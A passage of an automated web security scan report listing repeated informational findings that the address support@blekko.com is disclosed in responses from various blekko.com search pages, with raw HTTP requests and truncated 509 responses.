Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:19 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.78. http://blekko.com/ws/+/ip=82.165.91.243 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=82.165.91.243

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=82.165.91.243 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.79. http://blekko.com/ws/+/ip=82.165.91.243+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=82.165.91.243+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=82.165.91.243+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:18 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.80. http://blekko.com/ws/+/ip=87.230.63.11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=87.230.63.11

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=87.230.63.11 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.81. http://blekko.com/ws/+/ip=87.230.63.11+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=87.230.63.11+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=87.230.63.11+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:57 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.82. http://blekko.com/ws/+/ip=94.23.150.190 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=94.23.150.190

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=94.23.150.190 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:38 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.83. http://blekko.com/ws/+/ip=94.23.150.190+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=94.23.150.190+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/ip=94.23.150.190+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:59 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.84. http://blekko.com/ws/+/press-videos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/press-videos

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/press-videos?h=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:33 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.85. http://blekko.com/ws/+/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/privacy

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

Response

21.86. http://blekko.com/ws/+/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/terms

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/terms HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:44 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.87. http://blekko.com/ws/+/topspam previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/topspam

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/topspam HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.88. http://blekko.com/ws/+/webmaster previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/webmaster

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/webmaster HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.89. http://blekko.com/ws/+{searchTerms} previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+{searchTerms}

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+{searchTerms} HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:02 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.90. http://blekko.com/ws/cure+for+headaches previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/cure+for+headaches

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/cure+for+headaches HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:00 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.91. http://blekko.com/ws/global+warming+/liberal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/global+warming+/liberal

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/global+warming+/liberal HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.92. http://blekko.com/ws/xss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:18 GMT
Content-Type: text/html
Content-Length: 1357
Connection: keep-alive
Keep-Alive: timeout=15

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.93. http://blekko.com/ws/xss%20/cwe-79/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss%20/cwe-79/

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss%20/cwe-79/ HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:17 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.94. http://blekko.com/ws/xss%20cloudscan/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss%20cloudscan/

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss%20cloudscan/ HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:53 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.95. http://blekko.com/ws/xss+/blekko/groundhog-day previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/blekko/groundhog-day

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/blekko/groundhog-day HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:12 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.96. http://blekko.com/ws/xss+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:03 GMT
Content-Type: text/html
Content-Length: 1357
Connection: keep-alive
Keep-Alive: timeout=15

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.97. http://blekko.com/ws/xss+/cwe-79+/site=acunetix.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=acunetix.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=acunetix.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:20 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.98. http://blekko.com/ws/xss+/cwe-79+/site=blogs.msdn.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=blogs.msdn.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=blogs.msdn.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:25 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.99. http://blekko.com/ws/xss+/cwe-79+/site=cgisecurity.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=cgisecurity.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=cgisecurity.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.100. http://blekko.com/ws/xss+/cwe-79+/site=en.wikipedia.org previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=en.wikipedia.org

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=en.wikipedia.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:14 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.101. http://blekko.com/ws/xss+/cwe-79+/site=f-secure.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=f-secure.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=f-secure.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:26 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.102. http://blekko.com/ws/xss+/cwe-79+/site=github.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=github.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=github.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:24 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.103. http://blekko.com/ws/xss+/cwe-79+/site=golem.ph.utexas.edu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=golem.ph.utexas.edu

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=golem.ph.utexas.edu HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:37 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.104. http://blekko.com/ws/xss+/cwe-79+/site=googleonlinesecurity.blogspot.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=googleonlinesecurity.blogspot.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=googleonlinesecurity.blogspot.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:44 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.105. http://blekko.com/ws/xss+/cwe-79+/site=ha.ckers.org previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=ha.ckers.org

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=ha.ckers.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:15 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.106. http://blekko.com/ws/xss+/cwe-79+/site=microsoft.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=microsoft.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=microsoft.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:31 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.107. http://blekko.com/ws/xss+/cwe-79+/site=owasp.org previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=owasp.org

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=owasp.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:23 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.108. http://blekko.com/ws/xss+/cwe-79+/site=praetorianprefect.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=praetorianprefect.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=praetorianprefect.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:29 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.109. http://blekko.com/ws/xss+/cwe-79+/site=scmagazineus.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=scmagazineus.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=scmagazineus.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.110. http://blekko.com/ws/xss+/cwe-79+/site=seancoates.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=seancoates.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=seancoates.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:27 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.111. http://blekko.com/ws/xss+/cwe-79+/site=techmynd.com previous next

Summary

Severity:	Information
